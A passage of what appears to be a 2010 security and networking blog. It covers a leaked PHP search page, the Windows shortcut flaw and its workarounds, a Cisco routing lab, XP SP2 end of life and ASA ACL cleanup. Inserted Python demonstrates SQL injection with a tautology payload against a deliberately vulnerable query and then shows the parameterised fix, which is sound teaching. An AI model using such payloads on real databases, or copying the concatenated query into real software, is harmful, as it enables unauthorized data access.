    Now I ***DID NOT LOGIN*** I repeat ***DID NOT LOGIN*** so I don’t know if those credentials are valid, BUT what if they were? I am hoping for this person’s sake all of the above information is just for testing purposes, but what if it’s not? Sanitizing all valid information before posting it would have been nice.
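One more thing worth noticing in that paste, beyond the credentials: both the column name (`searchby`) and the search value (`query`) go straight from $_POST into the SQL string. As an added example (not the pasted author's code and not from the original post), here is the same query written in Python against an in-memory SQLite table with constructed rows, first in the pasted shape and then with the identifier allowlisted and the value bound as a parameter. A column name cannot be bound as a parameter, which is why the allowlist is needed for that half of the fix. The table rows and column set are assumptions.

```python
import sqlite3

# Columns the form is allowed to search by. The pasted page trusted
# $_POST['searchby'] directly; an identifier cannot be passed as a bound
# parameter, so an allowlist is the right tool for that part of the query.
ALLOWED_COLUMNS = {"Author_First_Name", "Author_Last_Name", "Title"}


def make_db():
    """In-memory stand-in for the `library` table, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        'CREATE TABLE library ("Author_First_Name" TEXT, "Author_Last_Name" TEXT, '
        '"Title" TEXT, "inout" TEXT)'
    )
    conn.executemany("INSERT INTO library VALUES (?, ?, ?, ?)", [
        ("Ada", "Lovelace", "Notes on the Analytical Engine", "in"),
        ("Alan", "Turing", "Computing Machinery and Intelligence", "out"),
    ])
    return conn


def search_vulnerable(conn, searchby, query):
    """Same shape as the pasted PHP: both user inputs concatenated into the SQL text."""
    sql = ("SELECT * FROM library WHERE `" + searchby + "` = '" + query
           + "' ORDER BY `Title` LIMIT 20")
    return conn.execute(sql).fetchall()


def search_safe(conn, searchby, query):
    """Allowlist the identifier, bind the value: the same query minus the injection."""
    if searchby not in ALLOWED_COLUMNS:
        raise ValueError("unsupported search column")
    sql = 'SELECT * FROM library WHERE "%s" = ? ORDER BY "Title" LIMIT 20' % searchby
    return conn.execute(sql, (query,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "x' OR '1'='1"  # a value that turns the concatenated WHERE clause into "always true"
    print("vulnerable:", len(search_vulnerable(db, "Title", tautology)), "rows")
    print("safe:      ", len(search_safe(db, "Title", tautology)), "rows")
```

With the bound parameter the quote inside the value is just data, so the same input returns nothing, and an unexpected column name is rejected before any SQL is built.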

    Jul 19 2010

    Microsoft Validates Shortcut Vulnerability

    Last Thursday I read a posting over at http://krebsonsecurity.com referencing a potential vulnerability that relates to the way Windows parses shortcuts. Since Microsoft didn’t confirm this at the time, it was just another interesting read. One day later Microsoft did validate this claim, and now it’s yet another Windows zero-day without a proper workaround.

    Issue:

    The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited.

    Workaround:

    Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

    Disable the displaying of icons for shortcuts

    Note: Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the “Changing Keys And Values” Help topic in Registry Editor (Regedit.exe) or view the “Add and Delete Information in the Registry” and “Edit Registry Data” Help topics in Regedt32.exe.

    1. Click Start, click Run, type Regedit in the Open box, and then click OK
    2. Locate and then click the following registry key:

    HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler

    3. Click the File menu and select Export
    4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save

    Note: This will create a backup of this registry key in the My Documents folder by default

    5. Select the value (Default) on the right hand window in the Registry Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter.
    6. Restart explorer.exe or restart the computer.

    Impact of workaround. Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

    Disable the WebClient service

    Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user’s computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.

    To disable the WebClient Service, follow these steps:

    1. Click Start, click Run, type Services.msc and then click OK.
    2. Right-click WebClient service and select Properties.
    3. Change the Startup type to Disabled. If the service is running, click Stop.
    4. Click OK and exit the management application.

    Impact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.

    How to undo the workaround.

    To re-enable the WebClient Service, follow these steps:

    1. Click Start, click Run, type Services.msc and then click OK.
    2. Right-click WebClient service and select Properties.
    3. Change the Startup type to Automatic. If the service is not running, click Start.
    4. Click OK, and exit the management application.

    This brings up the same concern I spoke about in this post: now that Microsoft no longer supports XP SP2, this vulnerability joins the list of those we can be certain will keep working against SP2, since no patch will ever be issued for it. In the end, if the workaround does not hinder any mission-critical application, I think everyone should apply it.

    References:

    http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw/

    http://www.computerworld.com/s/article/9179299/Microsoft_confirms_nasty_Windows_zero_day_bug?taxonomyId=17

    http://www.microsoft.com/technet/security/advisory/2286198.mspx

    http://clubhouse.microsoft.com/Public/Post/48631f1c-c884-4d3e-a19b-c9994bcd4637


    Jul 13 2010

    Cisco Administrative Distance Manipulation – Part 1

    Ok – “infolookup” has been asking for my contribution to his blog for quite some time now.  This is my first and hopefully not the last.

    Recently I needed to meet a redundancy requirement on a Cisco router running both EIGRP and OSPF. The requirement was simple: favor the prefix learned via EIGRP and use the prefix learned via OSPF as a backup. The catch is that the prefix arrives as an EIGRP external (D EX) route, which has an administrative distance (AD) of 170, and as an OSPF external type 2 (O E2) route, which has an AD of 110; since the lower AD wins, the router installs the OSPF route by default. In the first part of this article I will go through the setup of the lab, which closely simulates the scenario I had, and in the second part I will go through the actual remedy implemented that resulted in a “happy network”.

    Let’s get to it.

    First, let’s go through the topology. This lab contains five routers, R0 to R4, as follows:

    R0 = Representing a 3rd party network , who is advertising 198.200.230.0/24; 222.102.23.0/24; 0.0.0.0/0; 172.203.46.0/24

    R1 = R0’s BGP peer / NAT point of our network / redistribution point of BGP to EIGRP

    R2 = The Main router running EIGRP, RIP & OSPF (Think of this as the CORE of a particular site)

    R3 = Router running RIP and OSPF. This provides a backup route towards one of the destinations available from R0 (222.102.23.0/24)

    R4 = Router running OSPF. This provides a backup route towards one of the destinations available from R0  (198.200.230.0/24)

    Please see Topology Diagram:

    Administrative Distance Lab Topology

    R0’s relevant configuration:

    hostname R0
    !
    interface Loopback0
    ip address 198.200.230.1 255.255.255.0
    !
    interface Loopback1
    ip address 222.102.23.1 255.255.255.0
    !
    interface Loopback2
    ip address 172.203.46.1 255.255.255.0
    !
    interface FastEthernet0/0
    description FastE to R1
    ip address 10.146.12.2 255.255.255.254
    duplex auto
    speed auto
    !
    router bgp 65000
    no synchronization
    bgp log-neighbor-changes
    network 0.0.0.0
    network 172.203.46.0 mask 255.255.255.0
    network 198.200.230.0
    network 222.102.23.0
    neighbor R1-eBGP peer-group
    neighbor R1-eBGP remote-as 65001
    neighbor R1-eBGP route-map ROUTER-1-IN in
    neighbor R1-eBGP route-map ROUTER-1-OUT out
    neighbor 10.146.12.3 peer-group R1-eBGP
    no auto-summary
    !
    ip route 0.0.0.0 0.0.0.0 Null0
    !
    ip prefix-list R1-IN seq 5 permit 172.32.27.0/24
    !
    ip prefix-list R1-OUT seq 5 permit 198.200.230.0/24
    ip prefix-list R1-OUT seq 10 permit 222.102.23.0/24
    ip prefix-list R1-OUT seq 15 permit 172.203.46.0/24
    ip prefix-list R1-OUT seq 20 permit 0.0.0.0/0
    !
    route-map ROUTER-1-IN permit 10
    match ip address prefix-list R1-IN
    !
    route-map ROUTER-1-OUT permit 10
    match ip address prefix-list R1-OUT
    !
    Nothing fancy here, just basic BGP peering and prefix advertisement filters (in/outbound).

    R1’s relevant configuration:

    hostname R1
    !
    interface Loopback0
    ip address 172.32.27.1 255.255.255.0
    !
    interface Loopback1
    ip address 172.25.240.1 255.255.255.0
    !
    interface FastEthernet0/0
    description FastE to R2
    ip address 10.146.12.4 255.255.255.254
    ip nat inside
    ip virtual-reassembly
    duplex auto
    speed auto
    !
    interface FastEthernet1/0
    description FastE to R0
    ip address 10.146.12.3 255.255.255.254
    ip nat outside
    ip virtual-reassembly
    duplex auto
    speed auto
    !
    router eigrp 200
    redistribute bgp 65001 metric 1 1 1 1 1
    network 10.146.12.4 0.0.0.0
    network 172.25.240.1 0.0.0.0
    no auto-summary
    !
    router bgp 65001
    no synchronization
    bgp log-neighbor-changes
    network 172.32.27.0 mask 255.255.255.0
    neighbor R0-eBGP peer-group
    neighbor R0-eBGP remote-as 65000
    neighbor R0-eBGP route-map ROUTER-0-OUT out
    neighbor 10.146.12.2 peer-group R0-eBGP
    no auto-summary
    !
    ip nat pool OVERLOAD 172.32.27.100 172.32.27.100 netmask 255.255.255.0
    ip nat inside source list 10 pool OVERLOAD overload
    !
    ip prefix-list R0-OUT seq 5 permit 172.32.27.0/24
    !
    access-list 10 deny 10.146.12.3
    access-list 10 permit any
    !
    route-map ROUTER-0-OUT permit 10
    match ip address prefix-list R0-OUT
    !

    Not too fancy either: BGP-to-EIGRP redistribution, plus NAT overload of traffic matching ACL 10 as it leaves toward R0 (ACL 10 excludes R1’s own 10.146.12.3, so the BGP session itself is never translated). Since R1 only advertises 172.32.27.0/24 to R0, R0 has no route back to the 172.19.x, 172.25.x or 10.146.x addresses behind R1; without the NAT on R1 I would not be able to ping R0’s loopbacks from R4, for example.

    R2’s relevant configuration:

    hostname R2
    !
    interface FastEthernet0/0
    ip address 10.146.12.5 255.255.255.254
    duplex auto
    speed auto
    !
    interface FastEthernet1/0
    ip address 172.19.200.1 255.255.255.0
    duplex auto
    speed auto
    !
    router eigrp 200
    redistribute ospf 100 metric 1 1 1 1 1
    network 10.146.12.5 0.0.0.0
    no auto-summary
    !
    router ospf 100
    router-id 172.19.200.1
    log-adjacency-changes
    network 172.19.200.1 0.0.0.0 area 0
    network 172.25.196.1 0.0.0.0 area 0
    default-information originate always
    !
    router rip
    version 2
    network 172.19.0.0
    no auto-summary
    !

    Probably the simplest of all the configs, but this is the key router on which we’ll be going through the Administrative Distance (AD) exercise. Not a lot to explain here either: OSPF is redistributed into EIGRP so that R1 knows of the subnets from R3/R4 as well as the shared segment between R2, R3 and R4.

    R3’s relevant configuration:


    hostname R3
    !
    !
    interface Loopback1
    ip address 11.12.13.1 255.255.252.0
    !
    interface Loopback2
    ip address 14.15.16.1 255.255.252.0
    !
    interface Loopback3
    ip address 201.200.200.2 255.255.255.0
    !
    interface Loopback4
    ip address 199.199.199.1 255.255.255.0
    !
    interface FastEthernet0/0
    ip address 172.19.200.2 255.255.255.0
    duplex auto
    speed auto
    !
    router ospf 100
    router-id 172.19.200.2
    log-adjacency-changes
    network 11.12.13.1 0.0.0.0 area 0
    network 14.15.16.1 0.0.0.0 area 0
    network 172.19.200.2 0.0.0.0 area 0
    distribute-list prefix DEFAULT-ONLY in
    !
    router rip
    version 2
    redistribute static
    network 172.19.0.0
    no auto-summary
    !
    ip route 222.102.23.0 255.255.255.0 Null0
    !
    !
    ip prefix-list DEFAULT-ONLY seq 5 permit 0.0.0.0/0
    !

    A few things to note here.  Although Lo1/2 and Fa0/0 are in OSPF, I am only allowing a default (0.0.0.0/0) to be installed into the routing table from the OSPF process.  Also note the static route to Null0;  This is a lab after all, instead of having a dummy host on the other side of an interface, I created the static to Null0 so I can have a “live” static route to play with (ie. “redistribute static” under rip)

    R4’s relevant configuration:

    hostname R4
    !
    interface Loopback1
    ip address 199.20.46.1 255.255.254.0
    !
    interface Loopback2
    ip address 198.22.12.1 255.255.254.0
    !
    interface FastEthernet0/0
    ip address 172.19.200.3 255.255.255.0
    duplex auto
    speed auto
    !
    router ospf 100
    router-id 172.19.200.3
    log-adjacency-changes
    redistribute static subnets
    network 172.19.200.3 0.0.0.0 area 0
    distribute-list prefix DEFAULT-ONLY in
    !
    ip route 198.200.230.0 255.255.255.0 Null0
    !
    !
    ip prefix-list DEFAULT-ONLY seq 5 permit 0.0.0.0/0

    A few things to note here. Unlike R3, only Fa0/0 is in OSPF; Lo1/2 are not advertised at all. The static route to Null0 for 198.200.230.0/24 is redistributed into OSPF (redistribute static subnets), which is how R2 ends up with that prefix as an O E2 route, and as on R3 the inbound distribute-list lets only the default be installed from OSPF.

    Ok – Enough configuration. Let’s look at some show commands to verify that the network is up and running as we want, and point out the behaviour that needs correcting (to be done in Part 2).


    +++++++ R0
    R0#sh ip bgp summary | b Neigh
    Neighbor V AS MsgRcvd MsgSent TblVer InQ OutQ Up/Down State/PfxRcd
    10.146.12.3 4 65001 1677 1677 14 0 0 1d03h 1
    R0#sh ip bgp neighbors 10.146.12.3 advertised-routes | b Net
    Network Next Hop Metric LocPrf Weight Path
    *> 0.0.0.0 0.0.0.0 0 32768 i
    *> 172.203.46.0/24 0.0.0.0 0 32768 i
    *> 198.200.230.0 0.0.0.0 0 32768 i
    *> 222.102.23.0 0.0.0.0 0 32768 i
    Total number of prefixes 4
    R0#sh ip bgp | b Net
    Network Next Hop Metric LocPrf Weight Path
    *> 0.0.0.0 0.0.0.0 0 32768 i
    *> 172.32.27.0/24 10.146.12.3 0 0 65001 i
    *> 172.203.46.0/24 0.0.0.0 0 32768 i
    *> 198.200.230.0 0.0.0.0 0 32768 i
    *> 222.102.23.0 0.0.0.0 0 32768 i
    R0#

    +++++++ R1
    R1#sh ip nat statistics
    Total active translations: 0 (0 static, 0 dynamic; 0 extended)
    Outside interfaces:
    FastEthernet1/0
    Inside interfaces:
    FastEthernet0/0
    Hits: 409 Misses: 8
    CEF Translated packets: 181, CEF Punted packets: 16
    Expired translations: 47
    Dynamic mappings:
    -- Inside Source
    [Id: 1] access-list 10 pool OVERLOAD refcount 0
    pool OVERLOAD: netmask 255.255.255.0
    start 172.32.27.100 end 172.32.27.100
    type generic, total addresses 1, allocated 0 (0%), misses 102
    Appl doors: 0
    Normal doors: 0
    Queued Packets: 0
    R1#

    +++++++ R2

    R2#sh ip route eigrp
    172.203.0.0/24 is subnetted, 1 subnets
    D EX 172.203.46.0 [170/2560002816] via 10.146.12.4, 1d03h, FastEthernet0/0
    172.25.0.0/24 is subnetted, 1 subnets
    D 172.25.240.0 [90/156160] via 10.146.12.4, 1d05h, FastEthernet0/0
    172.32.0.0/24 is subnetted, 1 subnets
    D EX 172.32.27.0 [170/2560002816] via 10.146.12.4, 1d02h, FastEthernet0/0
    D*EX 0.0.0.0/0 [170/2560002816] via 10.146.12.4, 1d03h, FastEthernet0/0
    R2#sh ip route ospf
    O E2 198.200.230.0/24 [110/20] via 172.19.200.3, 1d02h, FastEthernet1/0
    11.0.0.0/32 is subnetted, 1 subnets
    O 11.12.13.1 [110/2] via 172.19.200.2, 1d02h, FastEthernet1/0
    14.0.0.0/32 is subnetted, 1 subnets
    O 14.15.16.1 [110/2] via 172.19.200.2, 1d02h, FastEthernet1/0
    R2#sh ip route rip
    R 222.102.23.0/24 [120/1] via 172.19.200.2, 00:00:16, FastEthernet1/0
    R2#

    +++++++ R3

    R3#sh ip route ospf
    O*E2 0.0.0.0/0 [110/1] via 172.19.200.1, 1d02h, FastEthernet0/0
    R3#sh ip rip database
    172.19.0.0/16 auto-summary
    172.19.200.0/24 directly connected, FastEthernet0/0
    222.102.23.0/24 auto-summary
    222.102.23.0/24 redistributed
    [1] via 0.0.0.0,
    R3#

    +++++++ R4

    R4#sh ip route ospf
    O*E2 0.0.0.0/0 [110/1] via 172.19.200.1, 1d02h, FastEthernet0/0
    R4#

    Below is the relevant output from R2, which shows that R2 is not using the EIGRP-learned routes to 222.102.23.0/24 and 198.200.230.0/24 but the RIP (AD 120) and OSPF (AD 110) routes instead, because both have a lower administrative distance than an EIGRP external route (AD 170). As mentioned earlier, the requirement for this scenario is that R2 use the EIGRP routes originated from R0, since they are the primary source. In Part 2, I’ll go through the configuration added on R2 to make that happen. If you do have ideas flowing through your head, please feel free to post your comment.

    Until Next Time (AJ)


    R2#sh ip route 222.102.23.1
    Routing entry for 222.102.23.0/24
    Known via "rip", distance 120, metric 1
    Redistributing via rip
    Last update from 172.19.200.2 on FastEthernet1/0, 00:00:11 ago
    Routing Descriptor Blocks:
    * 172.19.200.2, from 172.19.200.2, 00:00:11 ago, via FastEthernet1/0
    Route metric is 1, traffic share count is 1
    R2#sh ip route 198.200.230.0
    Routing entry for 198.200.230.0/24
    Known via "ospf 100", distance 110, metric 20, type extern 2, forward metric 1
    Redistributing via eigrp 200
    Advertised by eigrp 200 metric 1 1 1 1 1
    Last update from 172.19.200.3 on FastEthernet1/0, 1d02h ago
    Routing Descriptor Blocks:
    * 172.19.200.3, from 172.19.200.3, 1d02h ago, via FastEthernet1/0
    Route metric is 20, traffic share count is 1
    R2#sh ip eigrp topology 222.102.23.0/24
    IP-EIGRP (AS 200): Topology entry for 222.102.23.0/24
    State is Passive, Query origin flag is 1, 0 Successor(s), FD is 4294967295
    Routing Descriptor Blocks:
    10.146.12.4 (FastEthernet0/0), from 10.146.12.4, Send flag is 0x0
    Composite metric is (2560002816/2560000256), Route is External
    Vector metric:
    Minimum bandwidth is 1 Kbit
    Total delay is 110 microseconds
    Reliability is 1/255
    Load is 1/255
    Minimum MTU is 1
    Hop count is 1
    External data:
    Originating router is 172.32.27.1
    AS number of route is 65001
    External protocol is BGP, external metric is 0
    Administrator tag is 65000 (0x0000FDE8)
    R2#sh ip eigrp topology 198.200.230.0/24
    IP-EIGRP (AS 200): Topology entry for 198.200.230.0/24
    State is Passive, Query origin flag is 1, 1 Successor(s), FD is 2560000256
    Routing Descriptor Blocks:
    172.19.200.3, from Redistributed, Send flag is 0x0
    Composite metric is (2560000256/0), Route is External
    Vector metric:
    Minimum bandwidth is 1 Kbit
    Total delay is 10 microseconds
    Reliability is 1/255
    Load is 1/255
    Minimum MTU is 1
    Hop count is 0
    External data:
    Originating router is 192.168.20.2 (this system)
    AS number of route is 100
    External protocol is OSPF, external metric is 20
    Administrator tag is 0 (0x00000000)
    10.146.12.4 (FastEthernet0/0), from 10.146.12.4, Send flag is 0x0
    Composite metric is (2560002816/2560000256), Route is External
    Vector metric:
    Minimum bandwidth is 1 Kbit
    Total delay is 110 microseconds
    Reliability is 1/255
    Load is 1/255
    Minimum MTU is 1
    Hop count is 1
    External data:
    Originating router is 172.32.27.1
    AS number of route is 65001
    External protocol is BGP, external metric is 0
    Administrator tag is 65000 (0x0000FDE8)
    R2#

    +++++++ R1
    R1#sh ip route eigrp
    172.19.0.0/24 is subnetted, 1 subnets
    D EX 172.19.200.0 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
    11.0.0.0/32 is subnetted, 1 subnets
    D EX 11.12.13.1 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
    14.0.0.0/32 is subnetted, 1 subnets
    D EX 14.15.16.1 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
    R1#sh ip bgp neighbors 10.146.12.2 advertised-routes | b Net
    Network Next Hop Metric LocPrf Weight Path
    *> 172.32.27.0/24 0.0.0.0 0 32768 i
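The selection behaviour the show output documents, as an added example that is not part of AJ’s post: a small Python model of how a RIB picks one route per prefix by administrative distance. The candidate routes are the ones R2 reports above; the per-prefix AD overrides in prefer_eigrp_external are a hypothetical way of expressing the requirement and are not the remedy from Part 2. Note what the lab also demonstrates from a security point of view: R3 and R4 inject statics to Null0 into RIP and OSPF, and because RIP (120) and OSPF (110) have a lower AD than EIGRP external (170), R2 forwards traffic for both prefixes to routers that blackhole it while the legitimate BGP-originated path sits unused.

```python
"""Added example, not code from the original post: a model of how a Cisco
RIB chooses between routes for the same prefix offered by different
protocols.  Lowest administrative distance (AD) wins; metric is only
compared between routes from the same protocol.  Candidate routes are the
ones in R2's show output; the AD overrides are a hypothetical remedy used
to show the mechanism, not the configuration from Part 2."""
from dataclasses import dataclass

# Cisco IOS default administrative distances for the sources used here
DEFAULT_AD = {
    "connected": 0,
    "static": 1,
    "ebgp": 20,
    "eigrp": 90,            # EIGRP internal (D)
    "ospf": 110,            # O, O E1 and O E2 all default to 110
    "rip": 120,
    "eigrp external": 170,  # D EX, e.g. BGP redistributed into EIGRP on R1
    "ibgp": 200,
}


@dataclass(frozen=True)
class Candidate:
    prefix: str
    source: str     # key of DEFAULT_AD
    metric: int
    next_hop: str


def effective_ad(cand, ad_overrides):
    """AD for a candidate, honouring a (prefix, source) override that models
    an IOS 'distance' statement scoped with an access list."""
    return ad_overrides.get((cand.prefix, cand.source), DEFAULT_AD[cand.source])


def select_routes(candidates, ad_overrides=None):
    """Return {prefix: (ad, Candidate)} as the RIB would install them."""
    ad_overrides = ad_overrides or {}
    best = {}
    for cand in candidates:
        ad = effective_ad(cand, ad_overrides)
        current = best.get(cand.prefix)
        if current is None or ad < current[0]:
            best[cand.prefix] = (ad, cand)
        elif (ad == current[0] and cand.source == current[1].source
              and cand.metric < current[1].metric):
            best[cand.prefix] = (ad, cand)   # same protocol: lower metric wins
        # Equal AD from different protocols is kept as first seen; in IOS that
        # only happens if someone deliberately configured the ADs equal.
    return best


def lab_candidates():
    """R2's candidate routes for the two prefixes, from the show output."""
    return [
        # R3's static to Null0, redistributed into RIP (blackholes the prefix)
        Candidate("222.102.23.0/24", "rip", 1, "172.19.200.2"),
        Candidate("222.102.23.0/24", "eigrp external", 2560002816, "10.146.12.4"),
        # R4's static to Null0, redistributed into OSPF as E2
        Candidate("198.200.230.0/24", "ospf", 20, "172.19.200.3"),
        Candidate("198.200.230.0/24", "eigrp external", 2560002816, "10.146.12.4"),
    ]


def rib_lines(selected):
    """Render like 'show ip route': prefix [AD/metric] via next-hop (source)."""
    return [f"{prefix} [{ad}/{cand.metric}] via {cand.next_hop} ({cand.source})"
            for prefix, (ad, cand) in sorted(selected.items())]


def prefer_eigrp_external(candidates):
    """Hypothetical remedy (an assumption, not Part 2 of the post): raise the
    AD of the RIP and OSPF copies of exactly these two prefixes above 170, so
    the EIGRP external route is installed and the others stay as backups."""
    overrides = {
        ("222.102.23.0/24", "rip"): 180,
        ("198.200.230.0/24", "ospf"): 180,
    }
    return select_routes(candidates, overrides)


if __name__ == "__main__":
    print("Default ADs (what R2 shows today):")
    print("\n".join(rib_lines(select_routes(lab_candidates()))))
    print("\nWith the per-prefix AD overrides:")
    print("\n".join(rib_lines(prefer_eigrp_external(lab_candidates()))))
```

In IOS the knobs for this live under the routing process: distance eigrp sets EIGRP’s internal and external values, distance ospf external does the same for OSPF externals, and the plain distance form takes an access list so the change can be scoped to specific prefixes or neighbours. Whichever you use, scope it, because a blanket change re-orders every prefix those protocols carry. The same mechanics are why an unauthenticated RIP or OSPF neighbour is dangerous: anything it advertises arrives at AD 110 or 120 and beats an EIGRP external route without any further effort.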


    Jul 13 2010

    Patch Tuesday & XP SP2 end of life

    In Microsoft’s own words, Patch Tuesday is defined as: “When necessary, Microsoft releases security updates on the second Tuesday of each month. We publish security bulletins to announce and describe the update. Occasionally security updates are released more often.”

    Now just in case you are wondering why I am choosing today of all days to talk about Patch Tuesday: today is significant because patches and support for XP SP2 officially end today. This might not seem like a big deal to a lot of people, but I know there are several companies that still run legacy software that is not supported on SP3 or above. In short, any new vulnerability discovered in the coming months or years will leave all those users exposed, just waiting to be exploited.

    If you think that is bad, what about a vulnerability that was reported to Microsoft years ago and never patched? Those users could have been exploited already. A reference for this is a statement HD Moore made on Twitter today: “Almost four years later, Microsoft EOL’s Windows XP SP2 without fixing the flaw I reported in 2006.” HDM is the Chief Architect of the Metasploit project, which was created to provide information on exploit techniques and to build a functional knowledge base for exploit developers and security professionals. Luckily he is one of the good guys, but if this flaw and many more like it were in the wrong hands, the sky’s the limit.

    So for anyone still using XP SP2, it is time to apply the patches below and also come up with a strategy for these machines, which will only become more vulnerable from here on.

    Latest Security Updates

    • MS10-042 (Patch NOW) addresses a vulnerability in Microsoft Windows (KB 2229593) –> previous blog entry on this
    • MS10-043 – addresses a vulnerability in Microsoft Windows (KB 2032276)
    • MS10-044 – addresses vulnerabilities in Microsoft Office (KB 982335)
    • MS10-045 – addresses a vulnerability in Microsoft Office Outlook (KB 978212)

    Looking forward to seeing what  others might have to say about this.

    References:

    http://www.microsoft.com/security/updates/bulletins/default.aspx

    http://isc.sans.edu/diary.html?storyid=9166&rss

    http://www.microsoft.com/security/updates/bulletins/201007.aspx

    Jul 09 2010

    Cleaning up your access list

    As a Network Admin you soon realise that after a few months of adding ACL rules one at a time there comes a point when you need to go back and consolidate them before they get out of hand.

    With many hosted and cloud services now listening on non-standard TCP ports (8800, 3995 and the like) rather than the traditional 80 and 443, your job as a Network Admin requires a bit more planning.

    Normally if I get a call that a user is unable to access a certain website, I first verify whether it is a URL-filtering issue or a firewall access issue. If it is the latter, I write a typical ACL and grant the user access after the requested service has been tested.

    For instance, if you receive a call about not being able to access website X on port 5454, you can write a basic ACL rule (a single host on each side, so use the host keyword; a host address paired with a 255.255.255.0 mask does not express a single host and should be avoided):

    access-list external_access extended permit tcp host 192.168.10.5 host 69.196.224.24 eq 5454

    Now the above rule works just fine, but if you receive 10-15 of those requests a day your firewall will be a mess after a while. The way to take care of this is by using network objects and groups in a rule.

    Network objects let you predefine host and network IP addresses so that you can streamline subsequent configuration. When you configure the security policy, such as an access rule or a AAA rule, you can choose these predefined addresses instead of typing them in manually. Moreover, if you change the definition of an object, the change is inherited automatically by any rules using the object.

    Below is how you would accomplish this if you received, say, three requests for web-related access, all on different ports:

    ======================================
    Creating Object group and adding ports Cisco ASA Firewall
    ======================================

    config t
    object-group service External_Access tcp
    description Access to external websites
    port-object eq 7778
    port-object eq 5454
    port-object eq 3322

    object-group network External_Access_Users
    description Access to external websites
    network-object host 192.168.10.5
    network-object host 192.168.10.7
    network-object host 192.168.10.9

    =======================================
    Creating ACL and applying object group
    ========================================
    access-list acl_inside remark ***** External Websites Access *****
    access-list acl_inside extended permit tcp object-group External_Access_Users any object-group External_Access

    The next time you receive a request for external website access on a non-standard port you simply add the port to the service group and the host IP to the network group and you are set. That is much easier on the eyes! Two things to keep in mind, though. First, the rule is a cross product: every host in External_Access_Users gets every port in External_Access, so a user who asked for port 5454 also gets 7778 and 3322; if that matters, use a separate pair of groups per service. Second, the destination here is any, which is broader than the per-site rule above; if the requests name specific sites, put those in a network object-group as well and use it in place of any. And as always on the ASA, the ACL only takes effect once it is bound to an interface with access-group (for example access-group acl_inside in interface inside).

    If you have another way of achieving the same outcome don’t hesitate to leave a comment, in the end its all about learning.
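As an added example that is not code from the original post, here is a small Python script that performs the consolidation above mechanically: it parses one-off ASA ACEs, collects the source hosts and ports into object-groups, emits the replacement rule, and warns about the two things that go wrong when this is done by hand, a host address given with a network mask and a per-site destination being widened to any. The ACE lines, the function names (parse_ace, mask_mismatch, consolidate) and the warning texts are mine; the hosts, ports and group names are the post’s.

```python
"""Added example, not code from the original post: consolidate a pile of
one-off ASA ACEs into object-group based configuration, and flag the two
things that go wrong when doing so by hand.  The ACE lines below are
constructed for the example (hosts and ports taken from the post)."""
import ipaddress
import re

# One ACE per line: access-list NAME extended permit tcp SRC DST eq PORT
# where SRC/DST is 'host A.B.C.D', 'any' or 'A.B.C.D MASK'.
ADDR = r"host\s+\S+|any|\S+\s+\S+"
ACE_RE = re.compile(
    rf"^access-list\s+(?P<acl>\S+)\s+extended\s+permit\s+tcp\s+"
    rf"(?P<src>{ADDR})\s+(?P<dst>{ADDR})\s+eq\s+(?P<port>\d+)\s*$"
)

SAMPLE_ACES = [  # constructed: the kind of rules that pile up one request at a time
    "access-list acl_inside extended permit tcp host 192.168.10.5 host 69.196.224.24 eq 5454",
    "access-list acl_inside extended permit tcp host 192.168.10.7 host 69.196.224.24 eq 7778",
    "access-list acl_inside extended permit tcp host 192.168.10.9 any eq 3322",
    "access-list acl_inside extended permit tcp host 192.168.10.5 any eq 7778",
    # the classic mistake: a host address with a /24 mask
    "access-list acl_inside extended permit tcp 192.168.10.5 255.255.255.0 host 69.196.224.24 eq 5454",
]


def parse_ace(line):
    """Return the ACE's fields as a dict, or None if it is not in our shape."""
    m = ACE_RE.match(line.strip())
    return m.groupdict() if m else None


def mask_mismatch(spec):
    """True for 'A.B.C.D MASK' whose address has host bits set under MASK,
    e.g. '192.168.10.5 255.255.255.0': that is not a single host."""
    parts = spec.split()
    if len(parts) != 2 or parts[0] == "host":
        return False
    try:
        ipaddress.ip_network(f"{parts[0]}/{parts[1]}", strict=True)
        return False
    except ValueError:
        return True


def consolidate(lines, acl, svc_group, net_group, description):
    """Build the two object-groups and the single ACE that uses them.
    Returns (config_lines, warnings).  The result is a cross product:
    every host in net_group gets every port in svc_group."""
    ports, hosts, warnings = {}, {}, []
    for line in lines:
        ace = parse_ace(line)
        if ace is None:
            warnings.append(f"skipped line not in expected form: {line.strip()}")
            continue
        if mask_mismatch(ace["src"]) or mask_mismatch(ace["dst"]):
            warnings.append(f"host address given with a network mask: {line.strip()}")
        src = ace["src"].split()
        if src[0] != "host":
            warnings.append(f"source is not a single host, add it by hand: {line.strip()}")
            continue
        if ace["dst"] != "any":
            warnings.append(f"destination {ace['dst']} widened to any: {line.strip()}")
        ports[ace["port"]] = None     # dicts keep insertion order and dedupe
        hosts[src[1]] = None
    cfg = [f"object-group service {svc_group} tcp", f" description {description}"]
    cfg += [f" port-object eq {p}" for p in ports]
    cfg += [f"object-group network {net_group}", f" description {description}"]
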